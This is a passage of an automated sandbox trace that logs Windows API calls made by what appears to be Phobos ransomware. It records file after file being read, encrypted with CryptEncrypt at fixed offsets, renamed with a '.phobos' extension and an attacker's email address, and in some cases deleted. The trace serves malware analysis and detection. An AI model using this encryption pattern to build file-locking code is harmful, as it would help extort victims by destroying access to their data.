mail\\edbres00001.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.068] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.068] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.068] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0208.093] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.093] ReadFile (in: hFile=0x10c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0208.108] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.108] ReadFile (in: hFile=0x10c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0208.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32928) returned 1 [0208.393] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.394] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0208.399] CryptDestroyKey (hKey=0xa32928) returned 1 [0208.399] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0208.399] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0208.418] SetEndOfFile (hFile=0x10c) returned 1 [0208.419] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0208.419] WriteFile (in: hFile=0x10c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0208.420] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0208.420] WriteFile (in: hFile=0x10c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0208.422] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0208.422] WriteFile (in: hFile=0x10c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0208.423] CloseHandle (hObject=0x10c) returned 1 [0208.423] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0208.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.424] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2097152) returned 1 [0208.424] CloseHandle (hObject=0x10c) returned 1 [0208.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs")) returned 0x2020 [0208.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0208.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.425] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.425] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.425] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0208.533] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.533] ReadFile (in: hFile=0x10c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0208.791] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0208.791] ReadFile (in: hFile=0x10c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0208.867] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32928) returned 1 [0208.867] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.867] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0208.873] CryptDestroyKey (hKey=0xa32928) returned 1 [0208.873] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0208.873] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0208.891] SetEndOfFile (hFile=0x10c) returned 1 [0209.091] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0209.091] WriteFile (in: hFile=0x10c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0209.093] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0209.093] WriteFile (in: hFile=0x10c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0209.095] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0209.095] WriteFile (in: hFile=0x10c, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0209.097] CloseHandle (hObject=0x10c) returned 1 [0209.097] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0209.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0209.098] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2113536) returned 1 [0209.098] CloseHandle (hObject=0x10c) returned 1 [0209.098] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore")) returned 0x2020 [0209.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0209.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0209.099] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0209.099] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0209.099] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0209.188] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0xac000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0209.188] ReadFile (in: hFile=0x10c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0209.352] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x1c4000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0209.352] ReadFile (in: hFile=0x10c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0210.074] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32928) returned 1 [0210.074] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.074] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0070) returned 1 [0210.080] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.080] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0210.080] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0122, lpOverlapped=0x0) returned 1 [0210.090] SetEndOfFile (hFile=0x10c) returned 1 [0210.090] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x1c4000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0210.090] WriteFile (in: hFile=0x10c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0210.092] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0xac000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0210.092] WriteFile (in: hFile=0x10c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0210.394] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0210.394] WriteFile (in: hFile=0x10c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0210.396] CloseHandle (hObject=0x10c) returned 1 [0210.396] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.397] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1547) returned 1 [0210.397] CloseHandle (hObject=0x10c) returned 1 [0210.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 0x20 [0210.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.398] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.398] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0210.399] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0210.399] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.399] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x60b, lpOverlapped=0x0) returned 1 [0210.580] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x610, dwBufLen=0x610 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x610) returned 1 [0210.580] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x610, lpOverlapped=0x0) returned 1 [0210.581] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0210.581] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.581] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0210.581] CryptDestroyKey (hKey=0xa32a28) returned 1 [0210.581] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0210.581] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.581] CloseHandle (hObject=0x10c) returned 1 [0210.581] CloseHandle (hObject=0x178) returned 1 [0210.581] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 1 [0210.582] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0210.583] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=272) returned 1 [0210.583] CloseHandle (hObject=0x178) returned 1 [0210.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 0x20 [0210.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0210.583] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.584] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.584] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0210.584] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.584] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110, lpOverlapped=0x0) returned 1 [0210.589] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x120, dwBufLen=0x120 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x120) returned 1 [0210.589] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x120, lpOverlapped=0x0) returned 1 [0210.589] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0210.589] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.589] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0210.589] CryptDestroyKey (hKey=0xa32a28) returned 1 [0210.589] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0210.590] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.590] CloseHandle (hObject=0x178) returned 1 [0210.590] CloseHandle (hObject=0x10c) returned 1 [0210.590] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk")) returned 1 [0210.591] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, 